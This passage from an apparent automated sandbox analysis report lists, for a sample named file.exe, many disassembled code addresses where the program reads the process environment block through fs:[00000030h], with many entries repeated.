                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h] 3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FEE10E mov ecx, dword ptr fs:[00000030h] 3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F502E1 mov eax, dword ptr fs:[00000030h] 3_2_00F502E1
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_01018324 mov eax, dword ptr fs:[00000030h] 3_2_01018324
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_01018324 mov ecx, dword ptr fs:[00000030h] 3_2_01018324
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h] 3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_0101634F mov eax, dword ptr fs:[00000030h] 3_2_0101634F
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_0100A352 mov eax, dword ptr fs:[00000030h] 3_2_0100A352
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F502A0 mov eax, dword ptr fs:[00000030h] 3_2_00F502A0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FD62A0 mov ecx, dword ptr fs:[00000030h] 3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F7E284 mov eax, dword ptr fs:[00000030h] 3_2_00F7E284
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC0283 mov eax, dword ptr fs:[00000030h] 3_2_00FC0283
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h] 3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F44260 mov eax, dword ptr fs:[00000030h] 3_2_00F44260
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3826B mov eax, dword ptr fs:[00000030h] 3_2_00F3826B
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3A250 mov eax, dword ptr fs:[00000030h] 3_2_00F3A250
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F46259 mov eax, dword ptr fs:[00000030h] 3_2_00F46259
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FFA250 mov eax, dword ptr fs:[00000030h] 3_2_00FFA250
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC8243 mov eax, dword ptr fs:[00000030h] 3_2_00FC8243
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00FC8243 mov ecx, dword ptr fs:[00000030h] 3_2_00FC8243
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F3823B mov eax, dword ptr fs:[00000030h] 3_2_00F3823B
                      Source: C:\Users\user\Desktop\file.exe Code function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h] 3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F763FF mov eax, dword ptr fs:[00000030h]3_2_00F763FF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov ecx, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE43D4 mov eax, dword ptr fs:[00000030h]3_2_00FE43D4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE43D4 mov eax, dword ptr fs:[00000030h]3_2_00FE43D4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFC3CD mov eax, dword ptr fs:[00000030h]3_2_00FFC3CD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC63C0 mov eax, dword ptr fs:[00000030h]3_2_00FC63C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101625D mov eax, dword ptr fs:[00000030h]3_2_0101625D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6438F mov eax, dword ptr fs:[00000030h]3_2_00F6438F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6438F mov eax, dword ptr fs:[00000030h]3_2_00F6438F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE437C mov eax, dword ptr fs:[00000030h]3_2_00FE437C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov ecx, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE8350 mov ecx, dword ptr fs:[00000030h]3_2_00FE8350
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010162D6 mov eax, dword ptr fs:[00000030h]3_2_010162D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C310 mov ecx, dword ptr fs:[00000030h]3_2_00F3C310
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F60310 mov ecx, dword ptr fs:[00000030h]3_2_00F60310
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F404E5 mov ecx, dword ptr fs:[00000030h]3_2_00F404E5
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F744B0 mov ecx, dword ptr fs:[00000030h]3_2_00F744B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCA4B0 mov eax, dword ptr fs:[00000030h]3_2_00FCA4B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F464AB mov eax, dword ptr fs:[00000030h]3_2_00F464AB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA49A mov eax, dword ptr fs:[00000030h]3_2_00FFA49A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC460 mov ecx, dword ptr fs:[00000030h]3_2_00FCC460
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA456 mov eax, dword ptr fs:[00000030h]3_2_00FFA456
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6245A mov eax, dword ptr fs:[00000030h]3_2_00F6245A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3645D mov eax, dword ptr fs:[00000030h]3_2_00F3645D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A430 mov eax, dword ptr fs:[00000030h]3_2_00F7A430
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C427 mov eax, dword ptr fs:[00000030h]3_2_00F3C427
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F425E0 mov eax, dword ptr fs:[00000030h]3_2_00F425E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C5ED mov eax, dword ptr fs:[00000030h]3_2_00F7C5ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C5ED mov eax, dword ptr fs:[00000030h]3_2_00F7C5ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F465D0 mov eax, dword ptr fs:[00000030h]3_2_00F465D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A5D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A5D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E5CF mov eax, dword ptr fs:[00000030h]3_2_00F7E5CF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E5CF mov eax, dword ptr fs:[00000030h]3_2_00F7E5CF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F645B1 mov eax, dword ptr fs:[00000030h]3_2_00F645B1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F645B1 mov eax, dword ptr fs:[00000030h]3_2_00F645B1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E59C mov eax, dword ptr fs:[00000030h]3_2_00F7E59C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42582 mov eax, dword ptr fs:[00000030h]3_2_00F42582
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42582 mov ecx, dword ptr fs:[00000030h]3_2_00F42582
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F74588 mov eax, dword ptr fs:[00000030h]3_2_00F74588
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48550 mov eax, dword ptr fs:[00000030h]3_2_00F48550
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48550 mov eax, dword ptr fs:[00000030h]3_2_00F48550
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6500 mov eax, dword ptr fs:[00000030h]3_2_00FD6500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC06F1 mov eax, dword ptr fs:[00000030h]3_2_00FC06F1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC06F1 mov eax, dword ptr fs:[00000030h]3_2_00FC06F1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A6C7 mov ebx, dword ptr fs:[00000030h]3_2_00F7A6C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A6C7 mov eax, dword ptr fs:[00000030h]3_2_00F7A6C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F766B0 mov eax, dword ptr fs:[00000030h]3_2_00F766B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C6A6 mov eax, dword ptr fs:[00000030h]3_2_00F7C6A6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44690 mov eax, dword ptr fs:[00000030h]3_2_00F44690
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44690 mov eax, dword ptr fs:[00000030h]3_2_00F44690
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F72674 mov eax, dword ptr fs:[00000030h]3_2_00F72674
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A660 mov eax, dword ptr fs:[00000030h]3_2_00F7A660
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A660 mov eax, dword ptr fs:[00000030h]3_2_00F7A660
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5C640 mov eax, dword ptr fs:[00000030h]3_2_00F5C640
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E627 mov eax, dword ptr fs:[00000030h]3_2_00F5E627
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F76620 mov eax, dword ptr fs:[00000030h]3_2_00F76620
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78620 mov eax, dword ptr fs:[00000030h]3_2_00F78620
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4262C mov eax, dword ptr fs:[00000030h]3_2_00F4262C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82619 mov eax, dword ptr fs:[00000030h]3_2_00F82619
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE609 mov eax, dword ptr fs:[00000030h]3_2_00FBE609
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F447FB mov eax, dword ptr fs:[00000030h]3_2_00F447FB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F447FB mov eax, dword ptr fs:[00000030h]3_2_00F447FB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE7E1 mov eax, dword ptr fs:[00000030h]3_2_00FCE7E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F4C7C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC07C3 mov eax, dword ptr fs:[00000030h]3_2_00FC07C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F407AF mov eax, dword ptr fs:[00000030h]3_2_00F407AF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF47A0 mov eax, dword ptr fs:[00000030h]3_2_00FF47A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100866E mov eax, dword ptr fs:[00000030h]3_2_0100866E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100866E mov eax, dword ptr fs:[00000030h]3_2_0100866E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE678E mov eax, dword ptr fs:[00000030h]3_2_00FE678E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48770 mov eax, dword ptr fs:[00000030h]3_2_00F48770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
